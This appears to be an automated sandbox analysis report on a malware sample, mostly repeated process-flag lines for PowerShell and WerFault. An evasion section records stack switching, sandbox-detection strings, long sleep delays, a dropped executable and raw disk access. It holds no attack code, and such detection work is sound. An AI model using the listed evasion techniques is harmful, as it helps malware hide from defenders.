                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 51AB83A
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 1718218388.exe, 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001B.00000002.2753461974.0000000002509000.00000040.00001000.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2720989073.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2716880516.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                      Source: 1718218388.exeBinary or memory string: CFF EXPLORER.EXE
                      Source: 1718218388.exe, 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001B.00000002.2753461974.0000000002509000.00000040.00001000.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2720989073.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 1718218388.exe, 0000001C.00000003.2716880516.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593016
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592896
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592777
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592659
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592528
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592357
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592214
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591672
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591510
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591389
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591276
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591157
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591028
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4485Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5340Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7310
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2264
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeDropped PE file which has not been started: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeAPI coverage: 0.4 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep count: 4485 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200Thread sleep count: 5340 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 3384Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep count: 7310 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 33 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -30437127721620741s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep count: 2264 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -593016s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -592896s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -592777s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -592659s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -592528s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -592357s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -592214s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -591672s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -591510s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -591389s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -591276s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -591157s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -591028s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593016
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592896
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592777
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592659
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592528
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592357
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592214
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591672
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591510
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591389
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591276
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591157
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591028
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D25E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
